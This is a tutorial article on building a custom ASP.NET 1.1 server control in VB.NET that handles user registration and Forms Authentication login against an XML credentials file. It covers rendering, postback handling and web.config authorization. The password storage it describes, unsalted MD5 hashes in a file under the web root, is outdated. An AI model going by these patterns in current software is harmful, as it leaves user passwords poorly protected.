JSON API, although I’m not surpassingly familiar with JSON API. Missing Values One big difference between managing relationships directly and managing them through the flat cache is that with the flat cache, there is a (small) chance that the relationship won’t be there. This might happen because of a bug on the server side, or it might happen because of a consistency error when mutating the data in the flat cache (we’ll discuss mutation more in a moment). There are a few ways to handle this: - Return an Optional. What we chose to do for this app is return an optional. There are a lot of ways of handling missing values with optionals, including optional chaining, force-unwrapping, if let, and flatmapping, so it isn’t too painful to have to deal with an optional, and there aren’t any seriously deleterious effects to your app if a value is missing. - Force unwrap. You could choose to force-unwrap the relationship. That’s putting a lot of trust in the source of the data (JSON in our case). If a relationship is missing becuase of a bug on your server, your app will crash. This is really bad, but on the bright side, you’ll get a crash report for missing relationships, and you can fix it on the server-side quickly. - Return a Promise. While a promise is the most complex of these three solutions to deal with at the call site, the benefit is that if the relationship doesn’t exist, you can fetch it fresh from the server and fulfill the promise a few seconds later. Each choice has its downsides. However, one benefit to code generation is that you can support more than one option. You can synthesize both a promise and an optional getter for each relationship, and use whichever one you want at the call site. Mutability So far I’ve only really discussed immutable relationships and read-only data. The app where we’re using the pattern has entirely immutable data in its flat cache. All the data comes down in one giant blob of JSON, and then the flat cache is fully hydrated. We never write back up to the server, and all user-generated data is stored locally on the device. If you want the same pattern to work with mutable data, a few things change, depending on if your model objects are classes or structs. If they’re classes, they’ll need to be thread safe, since each instance will be shared across the whole app. If they’re classes, mutating any one reference to an entity will mutate them all, since they’re all the same instance. If they’re structs, your flat cache will need to be thread safe. The Sourcery template will have to synthesize a setter as well as a getter. In addition, anything long-lived (like a VC) that relies on the data being updated regularly should draw its value directly from the flat cache. final class PostVC { var postID: String init(postID: String) { self.postID = postID } var post: Post? { get { return cache.get(id: postID) } set { guard let newValue = newValue else { return } cache.set(value: newValue) } } } To make this even better, we can pull a page from Chris Eidhof’s most recent blog post about struct references, and roll this into a type. class Cached<T: Cachable> { var cache = FlatCache.shared let id: String init(id: String) { self.id = id } var value: T? { get { return cache.get(id: id) } set { guard let newValue = newValue else { return} cache.set(value: newValue) } } } And in your VC, the post property would be replaced with something like: lazy var cachedPost: Cached<Post>(id: postID) Lastly, if your system has mutations, you need a way to inform objects if a mutation occurs. NSNotificationCenter could be a good system for this, or some kind of reactive implementation where you filter out irrelevant notifications and subscribe only to the ones you care about (a specific post with a given post ID, for example). Singletons and Testing This pattern relies on a singleton to fetch the relationships. This has a chance of hampering testability. There are a few different options to handle this, including injecting the flat cache into the various objects that use it, and having the flat cache be a weak var property on each model object instead of a static let. At that point, any flat cache would be responsible for ensuring the integrity of its child objects references to the flat cache. This is definitely added complexity, and it’s a tradeoff that comes along with this pattern. References and other systems - Redux recommends a pattern similar to this. They have a post describing how to structure your data called Normalizing State Shape. They discuss it a bit in this post as.
https://khanlou.com/page/2/
CC-MAIN-2020-34
refinedweb
12,422
62.48
Well ... first please see this example using C++ ifstream: My question is how does ifstream object behave like a bool value in above code?My question is how does ifstream object behave like a bool value in above code?Code:#include <iostream> #include <fstream> using namespace std; int main(int argc, char** argv) { if (argc != 2) { cout << "Please give a file name." << endl; return 1; } ifstream in(argv[1]); if (in) { cout << "Success!" << endl; in.close(); } if (!in) { cout << "Failure!" << endl; return 2; } return 0; } I want to write my own class. And I wish it's objects would behave in the same way. Can you please tell me how can I write such a class?
http://cboard.cprogramming.com/cplusplus-programming/98009-object-bool-context.html
CC-MAIN-2015-48
refinedweb
116
84.68
In the first two installments of this series we reviewed the general flow in the API server and how state is managed using etcd. Now we’re moving to the topic of how to extend the core API. Initially, the only way to extend the API Server was to fork and patch the kube-apiserver source code and integrate your own resources. Alternatively, one could try and lobby to get the new types upstream into the core set of objects. This, however, leads to an issue: The core API would grow over time, leading to a potentially bloated API. Rather than letting the core get too unwieldy, the project came up with two ways to extend the core: - Using Custom Resource Definition (CRDs) which formerly were called Third Party Resources (TPRs). With these CRDs you have a simple, yet flexible way to define your own object kinds and let the API Server handle the entire lifecycle. - Using User API Servers (UAS) that run in parallel to the main API Server. These are more involved in terms of development and require you to invest more up-front: however, they give you much more fine-grained control over what is going on with the objects. Also, in the context of extensions, we will discuss the object lifecycle (from initialization to admission to finalizers). We'll cover the topic of CRDs in two posts as it is rather elaborate and we’re dealing with a few moving targets in the 1.7 to 1.8 transition. In this post, we focus on CRDs and in the second part we will show you how to write a custom controller for it, including code generation with kube-gen. Declaration and Creation of CRDs As we discussed in part 1, resources are grouped by API groups and have corresponding HTTP paths per version. Now if you were to implement a CRD, the first task is to name a new API group that can not overlap with an existing core group. Inside your own API group you can have as many resources as you like and they can have the same names as may exist in other groups. Let’s have a look at a concrete example: We differentiate between the CRD, which is like a class definition in object-oriented programming and the actual custom resource (CR) that you can view as a sort of instance. First we have a look at the class-level definition: In line 1 above you see the CRD apiVersion you must use; every kube-apiserver 1.7 and higher supports this. In line 5 and below you use the spec fields to define: - In line 6: The CRD API group (a good practice is to use a fully qualified domain name of your organization, example.comin our case. - In line 7: The version of your CRD object. There is only one version per resource, but there can be multiple resources with different versions in your API group. The spec.names field has two mandatory children: - In line 9: The kind, which is the upper-case singular by convention ( Database) - In line 10: The plural, which is the lowercase plural by convention ( databaseshere). You define the resource/HTTP path using the interestingly named field plural, which leads in our example to https://<server/apis/example.com/v1/namespaces/default/databases. There is also the optional singularfield that defaults to the lowercase kind value and can be used in the context of kubectl. In addition spec.names has a number of optional fields which are derived and filled in automatically by the API Server. Remember from part 1 that the kind describes the type of the object, while the resource corresponds to the HTTP path. Most of the times, those two match; but in certain situations, the API server might return different kinds on the same API http path (example: Status error object which are another kind, obviously). Note that the resource name ( databases in our example) and the group ( example.com) must match the metadata field name (see line 4, above). Now we’re in a position to actually create the CRD based on the above YAML spec: $ kubectl create -f databases-crd.yaml customresourcedefinition "databases.example.com" created Note that this creation process is an asynchronous one, meaning you have to check the CRD status to show that the specified names are accepted (that is, there are no name conflicts with other resources) and the API server has established the API handlers to serve the new resource. In a script or in code polling is a good way to wait for this to happen. Eventually, we get this: $ kubectl get crd databases.example.com -o yaml apiVersion: apiextensions.k8s.io/v1beta1 kind: CustomResourceDefinition metadata: creationTimestamp: 2017-08-09T09:21:43Z name: databases.example.com resourceVersion: "792" selfLink: /apis/apiextensions.k8s.io/v1beta1/customresourcedefinitions/databases.example.com uid: 28c94a05-7ce4-11e7-888c-42010a9a0fd5 spec: group: example.com names: kind: Database listKind: DatabaseList plural: databases singular: database scope: Namespaced version: v1 status: acceptedNames: kind: Database listKind: DatabaseList plural: databases singular: database conditions: - lastTransitionTime: null message: no conflicts found reason: NoConflicts status: "True" type: NamesAccepted - lastTransitionTime: 2017-08-09T09:21:43Z message: the initial names have been accepted reason: InitialNamesAccepted status: "True" type: Established Above, you can see that kubectl has picked up the CRD we defined earlier and is able to provide status information about it; all names are accepted without a conflict and that the CRD is established, that is, the API Server serves it now. Discovering and Using CRDs After proxying the Kubernetes API locally using kubectl proxy we can discover the database CRD we defined in the previous step like so: $ http 127.0.0.1:8001/apis/example.com HTTP/1.1 200 OK Content-Length: 223 Content-Type: application/json Date: Wed, 09 Aug 2017 09:25:44 GMT { "apiVersion": "v1", "kind": "APIGroup", "name": "example.com", "preferredVersion": { "groupVersion": "example.com/v1", "version": "v1" }, "serverAddressByClientCIDRs": null, "versions": [ { "groupVersion": "example.com/v1", "version": "v1" } ] } Note that kubectl caches discovery content by default for 10 minutes, using the ~/.kube/cache/discovery directory. Also, it can take up to 10 minutes for kubectl to see a new resource, such as the CRD we defined about. However, on a cache miss—that is, when kubectl can not identify the resource name in a command—it will immediately re-discover it. Next, we want to use an instance of the CRD: $ cat wordpress-database.yaml apiVersion: example.com/v1 kind: Database metadata: name: wordpress spec: user: wp password: secret encoding: unicode $ kubectl create -f wordpress-databases.yaml database "wordpress" created $ kubectl get databases.example.com NAME KIND wordpress Database.v1.example.com To monitor the resource creation and updates directly via the API, you can use a watch on a certain resourceVersion (as discussed in part 2. First, we’ll discover the resourceVersion of the database CRD we defined and then use curl to watch changes to the resource, in a separate shell session: $ http 127.0.0.1:8001/apis/example.com/v1/namespaces/default/databases HTTP/1.1 200 OK Content-Length: 593 Content-Type: application/json Date: Wed, 09 Aug 2017 09:38:49 GMT { "apiVersion": "example.com/v1", "items": [ { "apiVersion": "example.com/v1", "kind": "Database", "metadata": { "clusterName": "", "creationTimestamp": "2017-08-09T09" } } ], "kind": "DatabaseList", "metadata": { "resourceVersion": "2179", "selfLink": "/apis/example.com/v1/namespaces/default/databases" } } So here we find that our CRD resource /apis/example.com/v1/namespaces/default/databases/wordpres is in fact in "resourceVersion": "2154" currently and this is what we will use for the watch with curl: $ curl -f 127.0.0.1:8001/apis/example.com/v1/namespaces/default/databases?watch=true&resourceVersion=2154 Now we open a new shell session and delete the wordpress CRD resource; we can see the notification from the watch then in the original session: $ kubectl delete databases.example.com/wordpress Note: We could have also used kubectl delete database wordpress because there is no pre-defined database resource in Kubernetes. Moreover, the singular word database is the spec.name.singular field in our CRD, automatically derived following the English grammar. In the original session—where you launched the curl watch command—you can now see a live update from the API server: {"type":"DELETED","object":{"apiVersion":"example.com/v1","kind":"Database","metadata":{"clusterName":"","creationTimestamp":"2017-0[0/515] "}}} Taken together, using three shell sessions (an additional one for the initial kube proxy command at the bottom) the above commands and respective outputs look as follows: Finally, let’s have a look how the respective data of the database CRD is stored in etcd. In the following we’re accessing etcd, on the master node, directly via its HTTP API: $ curl -s localhost:2379/v2/keys/registry/example.com/databases/default | jq . { "action": "get", "node": { "key": "/registry/example.com/databases/default", "dir": true, "nodes": [ { "key": "/registry/example.com/databases/default/wordpress", "value": "{\"apiVersion\":\"example.com/v1\",\"kind\":\"Database\",\"metadata\":{\"clusterName\":\"\",\"creationTimestamp\":\"2017-08-09T14:53:40Z\",\"deletionGracePeriodSeconds\":null,\"deletionTimestamp\":null,\"name\":\"wordpress\",\"namespace\":\"default\",\"selfLink\":\"\",\"uid\":\"8837f788-7d12-11e7-9d28-080027390640\"},\"spec\":{\"encoding\":\"unicode\",\"password\":\"secret\",\"user\":\"wp\"}}\n", "modifiedIndex": 670, "createdIndex": 670 } ], "modifiedIndex": 670, "createdIndex": 670 } } As you can see from the etcd resource dump above, the CRD data is essentially an uninterpreted blob. Note that when deleting the CRD, all instances will be deleted as well, that is, it is a cascading delete operation. Current State, Limitations, and Future of CRDs At the moment, we have Kubernetes 1.7 as the stable release version and are expecting 1.8 landing by the beginning of October 2017. In this context, the state of CRDs is as follows: - CRDs started to replace ThirdPartyResources(TPRs) in Kubernetes 1.7 and TPRs will be removed for good in Kubernetes 1.8. - A simple migration path for TPRs to CRDs exists. - A single version per CRD is supported, however, multiple versions per group are possible. - CRDs present a consistent API and are basically indistinguishable from native resources from the user point of view. - CRDs are a stable basis for more features coming in the following versions, for example: - For validation with JSON-Schema, you can check out the CRD validation proposal - Garbage collection in 1.8 Now that you’ve seen how to use CRDs, let’s discuss their limitations: - They do not provide the capability for version conversion, that is, only one version is possible per CRD (it is not expected to see conversion support near- or mid-term). - There is no validation currently but might land in 1.8, see this Google Summer of Code project. and limited validation expressiveness with upcoming JSON Schema (not Turing complete). - No fast, in-process admission possible (but initializers and admission webhooks are supported) - You can not define sub-resources, for example, scaleor status, however there's a proposal for it on the way. - Last but not least, CRDs currently do not support defaulting, that is, assigning default values to certain fields (this might come in one of the following versions). In order to address the above issues and have a more flexible way to extend Kubernetes, you can use User API Servers (UAS), running in parallel to the main API Server. We will go into detail on writing UASs in one of the next installments of this blog post series. Next time around we will complete the CRD by writing a custom controller for it. Categories
https://www.openshift.com/blog/kubernetes-deep-dive-api-server-part-3a
CC-MAIN-2021-17
refinedweb
1,911
52.8
Created on 2019-11-29 21:14 by JohnnyNajera, last changed 2019-12-10 01:17 by terry.reedy. This issue is now closed. In Ubuntu 19.10 and probably earlier versions of Ubuntu, the autocomplete window doesn't show up when expected. This is probably due to wm_geometry called in a context in which it has no effect. IDLE completes global names, attributes, and file names with various invocation methods. The main problem users have in editor windows is not running the module to update namespaces. But the claim here (and in the PR) is that there is a timing problem. JN, please post at least one minimal, specific, sometimes reproducible example, with code and user actions, that misbehaves. Do you have any idea why a 1 millesecond delay helps? (3.5 and 3.6 only get security fixes.) At least this scenario: Ubuntu 19.10 Open the interpreter Literally nothing makes the autocomplete window show up. As mentioned in the PR, it's not about the 1-ms but about being called outside of the event itself. This can also be fixed by immediately calling `update_idletasks`, but more about this in the PR. Thanks, have a nice day. New changeset bbc4162bafe018f07bab0b624b37974cc33daad9 by Terry Jan Reedy (JohnnyNajera) in branch 'master': bpo-38943: Fix IDLE autocomplete window not always appearing (GH-17416) New changeset 1b0e88dde146eb290735f4b486d4a67074132100 by Miss Islington (bot) in branch '3.7': bpo-38943: Fix IDLE autocomplete window not always appearing (GH-17416) New changeset 34d5d5e096ee804e94199bf242469cdf9bbc3316 by Miss Islington (bot) in branch '3.8': bpo-38943: Fix IDLE autocomplete window not always appearing (GH-17416)
https://bugs.python.org/issue38943
CC-MAIN-2020-45
refinedweb
266
67.55
Sharad Shivmath14,446 Points What am I doing wrong here? I'm getting an error: Did you return the result of 'number * number' in your anonymous method delegate? Restart ? using System; namespace Treehouse.CodeChallenges { public class Program { public Func<int, int> Square = delegate (int number) { int result = number*number; return result; }; } } 1 Answer Steven Parker158,773 Points Apparently, when they say *"returns the result of number * number" they mean it quite literally — the challenge seems to only allow the calculation to be returned directly instead of by creating an intermediate variable. In actual practice your solution would work exactly the same but it doesn't pass the challenge. You may want to report this as a bug to the Support staff.
https://teamtreehouse.com/community/what-am-i-doing-wrong-here-78
CC-MAIN-2019-18
refinedweb
121
52.19
G. Andrew Duthie Graymad Enterprises, Inc January 2004 Applies to: Microsoft® ASP.NET Summary: One anticipated feature in the upcoming version of ASP.NET, code name ASP.NET "Whidbey" (after the code name for the upcoming release of Visual Studio .NET), is the addition of controls to assist in registering and authenticating users. This article shows how you can create a control to add this functionality to ASP.NET 1.1. (21 printed pages) Download RegLoginControlSample.msi. Introduction Control Overview Creating the Basic Control Building the UI Handling Postbacks Verifying and Saving Credentials Configuring Forms Authentication and Authorization Using the RegLogin Control Bonus Control: LoginStatus Summary Unless you have been living on a desert island somewhere, if you are a Microsoft® ASP.NET developer, you have probably heard of a little thing called Whidbey (see ASP.NET "Whidbey" and ASP.NET Whidbey. Whidbey was announced to great fanfare at the 2003 Professional Developer's Conference in Los Angeles, and offers a host of new features that simplify development and reduce the amount of code .NET developers need to write. One of the features that is surely going to excite ASP.NET developers is the inclusion of a set of server controls that encapsulate much of the code required for registering and authenticating users (Michele Leroux Bustamante writes about these controls in her article, Securing ASP.NET Applications - With Less Code. These controls reduce, and in some cases eliminate, the code you need to write to perform common authentication tasks. "That sounds great," you say, "but Whidbey isn't out yet. What do I do now?" The answer to that question is that you can, with a little help from this article, write your own registration and login control to encapsulate the code used for these tasks, and provide simplified development and reuse across your applications. In this article, I will demonstrate how you can create a single control that provides both user registration and authentication using ASP.NET Forms Authentication. For simplicity's sake, this example uses an XML file as the credential store for the control. The control, however, can be easily modified to authenticate credentials against a database or other back-end data store (for example, in order to avoid storing credentials within the web space of the application). The control consists of two separate sets of UI elements: one for logins, and one for registrations, shown in Figures 1 and 2. The control determines which UI to display on the basis of an internal variable, _mode, and defaults to displaying the login UI. Figure 1. The RegLogin control in Login mode Figure 2. The RegLogin control in Register mode In addition to displaying the UI elements, the control exposes one public, read-only property called StatusMessage, which is used to communicate information about the success or failure of the login or registration to the consuming page. This allows the developer using the control to choose how and where this information is displayed to the end user. The control also exposes one public method, CreateBlankUsersFile, which can be used to create the XML file used to store credentials for the control. The RegLogin control will automatically call this method internally if it determines at runtime that the file does not exist. Tip Since write access is required on the folder where the XML file is created (for this control, the application root); you may want to call CreateBlankUsersFile from a utility page running with administrative credentials using Impersonation to get the file created. Once the file is created, you can assign read/write permissions on the file to the ASPNET user account, which will allow the control to add new credentials when necessary. The first step in creating the RegLogin control is to create a new project, using the Web Control Library template, as shown in Figure 3. Figure 3. The Web Control Library template As thoughtful as it is of Microsoft Visual Studio® to add a template control class for you, I usually end up adding one with the name I want (in my project, RegLogin) and delete the default class. This is simpler than renaming the default class (which requires that you rename both the class and file; otherwise your naming can get a little hard to track and maintain). So delete the WebCustomControl1.vb class, and add a new class using the Web Custom Control template, as shown in Figure 4. Figure 4. The Web Custom Control template There are a couple of different ways to build a UI in ASP.NET server controls. The simpler technique, which I will demonstrate with this control, is rendering the output directly from the control. A more complicated, but in some cases more powerful, technique is to use composition, in which the UI for a custom server control is built up from a number of pre-existing server controls, each of which is responsible for rendering its own portion of the control's UI. To stay focused, we will leave further discussion of composite controls to other articles (such as MSDN® Magazine's Advanced ASP .NET Server-side Controls and the .NET Framework Developer's Guide documentation on Developing a Composite Control and focus on rendering. The Web Custom Control Template is designed for creating a rendered control. Here is a look at the template's code (I have removed the attributes to make the code more readable): Imports System.ComponentModel Imports System.Web.UI Public Class WebCustomControl1 Inherits System.Web.UI.WebControls.WebControl Dim _text As String Property [Text]() As String Get Return _text End Get Set(ByVal Value As String) _text = Value End Set End Property Protected Overrides Sub Render(ByVal output As _ System.Web.UI.HtmlTextWriter) output.Write([Text]) End Sub End Class The template includes a couple of useful Imports statements, and contains a class that inherits from the WebControl base class, has a single property (Text), and overrides the Render method of its base class in order to render its output—in this case just the contents of the Text property. Note Because Text is a commonly used member name in the .NET Framework, the property name is encased in square brackets, which tells the Microsoft Visual Basic® compiler to use the local version of Text, rather than the one in any referenced assemblies. Alternatively, you could precede the property name with the full namespace of this control. A more common use of square brackets in Visual Basic is to allow the use of member names that are the same as restricted keywords, particularly for legacy code. While surrounding a member name such as Loop with square brackets will allow you to use that name, it is highly recommended that you avoid the use of restricted keywords for class or member names, which can make your code more error-prone and difficult to maintain. The default base class in the Web Custom Control template is System.Web.UI.WebControls.WebControl. While this is a reasonably good starting point for many controls, in order to avoid unnecessary complexity and confusion, it is best to inherit from the simplest base class that provides all the functionality you need. Since we want to keep our login control relatively simple, we will change the base class for the control from System.Web.UI.WebControls.WebControl to System.Web.UI.Control, which is the base class from which all ASP.NET server controls ultimately inherit: Public Class RegLogin Inherits System.Web.UI.Control For rendered controls, you will override the Render method of the control's base class to render your custom output. Note that if you inherit from a richer control, such as the TextBox, or DropDownList controls, you will also want to call the Render method of the base class at some point, in order to render the output of the base class. Because the Control class has no UI of its own, there is no need to do that for our control. One thing to remember is that you do not need to have all of your rendering logic directly within the Render method. For our RegLogin control, we will actually just use the Render method to execute a Select Case statement, and call a separate method, depending on the outcome, to render the appropriate output (registration UI or login UI) for our control: Protected Overrides Sub Render(ByVal output As _ System.Web.UI.HtmlTextWriter) Select Case _mode Case RegLoginMode.Register DisplayRegUI(output) Case RegLoginMode.Login DisplayLoginUI(output) End Select End Sub The Select Case statement evaluates the private member variable _mode, which uses an enumeration for its type, and defaults to RegLoginMode.Login: Dim _mode As RegLoginMode = RegLoginMode.Login The enumeration definition (which resides within the same file, but outside the class declaration) is shown below: Public Enum RegLoginMode End Enum Once we have figured out which mode we are in, we call either DisplayRegUI or DisplayLoginUI, in each case passing the HtmlTextWriter instance, output, that is passed to the Render method. DisplayRegUI and DisplayLoginUI illustrate two different techniques for building up the output to be rendered to the browser. DisplayRegUI uses the StringBuilder class to assemble a string containing the output to be rendered, writing all of the output at once at the end of the method, and uses standard HTML tags for the output (along with Visual Basic constants such as vbTab for adding whitespace). DisplayLoginUI uses methods of the HtmlTextWriter instance passed to the procedure, as well as static properties of the HtmlTextWriter class to assemble and format the output. Using this technique, the output is rendered little by little, with each call to Write or WriteLine. Both rendering methods take advantage of some helpful members of the Control and Page classes to facilitate postbacks for the control. The calls to Me.UniqueID returns the name of the control, including any naming containers for that control (in our case, it returns just the name of the RegLogin control). Writer.WriteAttribute("name", Me.UniqueID) Both DisplayRegUI and DisplayLoginUI also call Page.GetPostBackEventReference in order to set up the JavaScript necessary to post back the control with the appropriate parameters (control name, etc.). Note that the use of client-side script does mean that this control will not work properly if the user has turned off JavaScript in their browser: Writer.WriteAttribute("OnClick", "javascript:" & _ Page.GetPostBackEventReference(Me, "Login")) One important difference between DisplayLoginUI and DisplayRegUI is that while DisplayRegUI only provides for posting back the contents of its form fields by clicking a button, DisplayLoginUI also may display a link that causes the control to switch to registration mode, based on the _displayRegLink internal member variable. _displayRegLink is a Boolean that is set to True when a user attempts to log in, but the provided username is not found, as we will see later in this article. Another notable difference between DisplayLoginUI and DisplayRegUI is that DisplayLoginUI renders two textboxes, one each for username and password, while DisplayRegUI adds a third textbox for password confirmation. We will see why this is important in the next section. A final note on the rendering of the RegLogin control: the code used to render the registration and login UI for this control could be greatly simplified by rendering only the UI elements themselves, rather than the HTML table elements used to align the elements neatly, but that would also result in a rather unsightly control. This highlights a common trade-off in control development: more functionality, flexibility, or improved appearance often comes at the cost of additional code or complexity. Something you should keep in mind when designing your own controls. To handle the postbacks that our control will generate at runtime, we will need to add an Implements keyword to the class declaration referencing the IPostBackDataHandler and IPostBackEventHandler interfaces: Public Class RegLogin Inherits System.Web.UI.Control Implements IPostBackDataHandler, IPostBackEventHandler IPostBackDataHandler defines two methods, LoadPostData, and RaisePostDataChangedEvent, which are used for loading the data submitted with a postback and responding to changes in data between postbacks, respectively. Note RaisePostDataChangedEvent will only be called by the runtime if LoadPostData, which returns a Boolean, returns True. This means that if you care about changes in data between one postback and a subsequent postback, you should store the data. IPostBackEventHandler defines a single method, RaisePostBackEvent, which is used for determining whether an event should be raised as the result of a given postback, and raising the event, if necessary. Implementing the interfaces requires that we add the methods defined in the interfaces. The good news is that this is fairly easy to do, even if you do not already know the exact method signature (method name, arguments, and return type) to use. Once you have added the desired interface(s), you can simply select an interface from the Class Name dropdown in the Visual Basic code editor, and then select the desired method name from the Method Name dropdown, as shown in Figure 5. Members for which an implementation exists in the current class are shown in boldface. You can also use this technique to add event handlers for controls that are used in your classes, as well as other method implementations. Figure 5. Adding an implementation for method defined by an interface In the RegLogin control, we need to handle three postback possibilities: We handle all of these possibilities by examining the contents of the __EVENTARGUMENT form field passed with the postback, and taking the appropriate action: Public Function LoadPostData(ByVal postDataKey As String, _ ByVal postCollection As _ System.Collections.Specialized.NameValueCollection) _ As Boolean _ Implements System.Web.UI.IPostBackDataHandler.LoadPostData Dim newValues As String() = Split(postCollection(postDataKey), ",") Dim Result As Boolean = False Select Case Page.Request.Form("__EVENTARGUMENT") Case "DisplayRegUI" _mode = RegLoginMode.Register Case "Login" Result = LoadLoginPostData(newValues) Case "Register" _mode = RegLoginMode.Register Result = LoadRegisterPostData(newValues) End Select Return Result End Function The __EVENTARGUMENT form field is set by the second parameter passed to the call to Page.GetPostBackEventReference in the DisplayLoginUI and DisplayRegUI methods. Note that if the value of __EVENTARGUMENT is either "DisplayRegUI" or "Register", we set the _mode member variable to RegLoginMode.Register, which causes the registration UI to be rendered. Since _mode defaults to RegLoginMode.Login, we do not need to explicitly set the login mode when the value of __EVENTARGUMENT is "Login". We only need to process postback data in the "Login" and "Register" cases, so in these cases we also call another method (either LoadLoginPostData or LoadRegisterPostData) to load the postback data into the appropriate member variables for further processing. Note that we split the collection passed into LoadPostData into a string array called newValues that we then pass into the method in which we will actually load the postback data. Also note that both LoadLoginPostData and LoadRegisterPostData return a Boolean, and their return value determines what is returned from LoadPostData (which determines whether RaisePostDataChangedEvent is called). In LoadLoginPostData, we pull the username into a local variable, pull the password into the _password member variable, and then compare the local username variable to the _userName member variable to see if the username has changed since the last postback. If it has, we assign the new value to _userName, and return True to indicate that RaisePostDataChangedEvent should be called. In our case, we do not actually do anything useful in RaisePostDataChangedEvent, but this example shows how it operates. Note We are able to compare the value of the member variable _userName to the new value passed in because we save the value of _userName and restore it with each postback, by overriding the SaveViewState and LoadViewState methods of the Control base class: Protected Overrides Sub LoadViewState(ByVal savedState As Object) If Not savedState Is Nothing Then _userName = CStr(savedState) End If End Sub Protected Overrides Function SaveViewState() As Object Return _userName End Function In LoadRegisterPostData, we pull the username, password, and password confirm values from the postback into the appropriate member variables, and return False. We return False because we would not expect the user to change their username when re-submitting the registration information. Of course, it is possible they might, so this is a place where you might want to add some logic to check for this and take appropriate action. I have left this out to keep things simple. Once we have loaded the data from the postback into the appropriate local variables, we will need to either retrieve and verify the credentials against those stored in our XML file (in the case of a postback from the login UI), or save the new username and password (in the case of a postback from the registration UI). We will discuss these in the next section. The starting point for verifying and saving credentials is the RaisePostBackEvent method, which is called automatically by the runtime on the control that causes a postback, assuming it implements IPostBackEventHandler. When using JavaScript to post back the page, as in the case of the "Register" link, the eventArgument parameter passed to RaisePostBackEvent by the runtime contains the name of the argument parameter passed to Page.GetPostBackEventReference, which allows us to determine if it was the "Register" link that caused the postback. Since one of the purposes of RaisePostBackEvent is to raise events to the page that contains the control, we will need to define the events we intend to raise from our control, which we do with the following event declarations: 'Event declarations Public Event AuthSuccess As EventHandler Public Event AuthFailure As EventHandler Public Event RegSuccess As EventHandler Public Event RegFailure As EventHandler Once the events have been declared, we can raise them using the RaiseEvent keyword, as we will see shortly. In RaisePostBackEvent, we first examine the _mode member variable to determine if we are in Register or Login mode. For Register mode, we determine whether the "Register" link caused the postback. If so, we perform no further processing, since the purpose of the postback in this case is simply to switch from displaying the login UI to displaying the registration UI. If the postback was not the result of the "Register" link being clicked, we attempt to save the provided credentials by calling the SaveCredentials method. The SaveCredentials method creates a new DataSet instance (we do not need to specify the System.Data namespace in which the DataSet class resides because this namespace is automatically imported at the project level in all new Visual Basic .NET projects), reads in the current credentials file (using the DataSet's ReadXml method), and then attempts to save the credentials passed to it by RaisePostBackEvent as a new row, and if successful, saves the credentials back to the XML file using the DataSet's WriteXml method. If the save is successful, SaveCredentials returns True. If the username already exists in the credentials file, or the passwords provided do not match, then the credentials are not saved, and SaveCredentials returns False. We also set the _statusMessage member variable (which is exposed as the public property StatusMessage) to provide a helpful indication of the reason for the failure of registration. The page that consumes the control can use the StatusMessage property to provide this message to the end user. Note that the password is stored as an MD5 hash using the HashPasswordForStoringInConfigFile method of the FormsAuthentication helper class (the Imports System.Web.Security line at the top of RegLogin.vb allows us to call this method without explicitly calling out the namespace). Note StatusMessage in this example is exposed as a property to demonstrate the setting and exposing of a property on a custom server control. The downside to this technique for the StatusMessage property is that if the consuming page does not read and display the StatusMessage property, the end user will not know why their registration (or login) failed. For this reason, you might want to render the status message directly from the control if you want to ensure that the message is always displayed. If SaveCredentials returns True, we raise the RegSuccess event and switch the control to login mode, otherwise we raise the RegFailure event, and keep the control in register mode (to give the user the opportunity to correct the problem with their registration. The VerifyCredentials method, which we call from RaisePostBackEvent when we are in login mode, performs similar logic to the SaveCredentials method. It first creates a new DataSet, then attempts to read in the credentials from the credentials file. Since there is a possibility that there might not be a credentials file available the first time someone attempts to login, the attempt is wrapped with a Try...Catch block that can catch a FileNotFoundException, and call CreateBlankUsersFile to create the file from scratch (note that if the ASP.NET user does not have write permissions on the root of the application, this call will throw an exception). If the ReadXml call is successful, we use the Select method exposed by the DataTable class (each DataSet contains one or more DataTable objects) to locate the row, if any, that matches the provided username. If a match is found, we hash the password provided by the user and compare it to the stored hash for that username. If they match we return True, and provide a status message to that effect. If either the username or password do not match, we return False, and set _statusMessage to an appropriate value. In the case of a username mismatch, we also set the _displayRegLink member variable to True, which will cause the "Register" link to be rendered, allowing the user to switch to register mode. As with SaveCredentials, the return value from VerifyCredentials determines the event to be raised. If False, we raise the AuthFailure event. If True, we raise the AuthSuccess event, and call the SetAuthCookie method of the FormsAuthentication class to set the authentication cookie that will allow the user to access restricted content. That completes the control, so we can now compile the control, and then prepare to use it in a page. There are several steps involved in this preparation: The first thing we will do is create a new Web Application project, and then set up Forms Authentication by modifying the <authentication> section of the Web.config file at the root of the application (this file is added automatically when you create a new ASP.NET Web Application project) to look like the following: <authentication mode="Forms"> <forms loginUrl="Login.aspx" protection="All"> </forms> </authentication> This tells ASP.NET to use Forms Authentication with this application (the default is Windows Authentication), that the name of the login page for the application is Login.aspx (this also happens to be the default, but it never hurts to be explicit), and to both encrypt the authentication cookie and validate that its contents have not been altered in transit. Once Forms Authentication is configured, we use the <authorization> element to explicitly provide or restrict access to resources, based on usernames, groupnames, or wildcards ("*" for all users and/or "?" for anonymous users). If we add the <authorization> element to the Web.config file at the root of the application, the restriction(s) will apply to all files handled by ASP.NET within the application. Since our sample application will contain pages that we want all users to be able to access, we will start with the following in Web.config, which is the default: <authorization> <authorization> <allow users="*" /> </authorization> Then, we will add the following, which prevents anonymous users from accessing the file ProtectMe.aspx. The <location> element provides the ability to apply configuration elements to a specific file or directory specified by its path attribute. You can also add an allowOverride attribute to specify whether the elements contained within the <location> element can be overridden by Web.config files in subdirectories of the application: <location> <location path="ProtectMe.aspx"> <system.web> <authorization> <deny users="?"/> </authorization> </system.web> </location> The above configuration section needs to be placed inside the <configuration> element of Web.config, but outside the <system.web> element (since it defines its own <system.web> element). <configuration> <system.web> The last important configuration task is protecting the credentials file, which requires two steps. The first step is required because ASP.NET does not natively handle .xml files. As such, we need to tell IIS to pass requests for .xml files to ASP.NET, so that we can secure them using an HttpHandler provided for the purpose of preventing download of certain file types. To configure ASP.NET to handle .xml files, follow these steps: Once the application mapping for .xml files has been set up, we can prevent the credentials file from being downloaded by adding the following section to Web.config: <httpHandlers> <add verb="*" path="Users.xml" type="System.Web.HttpForbiddenHandler"/> </httpHandlers> This tells ASP.NET to refuse any requests for the file Users.xml by assigning the HttpForbiddenHandler to that filename. Now that our client application is configured, we will take a look at how the control is used in a page. First, we will add a login page to the Web Application project by right-clicking the project and selecting Add > Add Web Form, and naming the file Login.aspx. With Login.aspx open in Design mode, let us take a moment to add the RegLogin control to the Visual Studio .NET toolbox, using the following steps: Figure 6. The Customize Toolbox dialog Figure 7. The RegLogin control in the Toolbox Now we are ready to use the control. To simplify the layout of the page, use the Properties window to change the 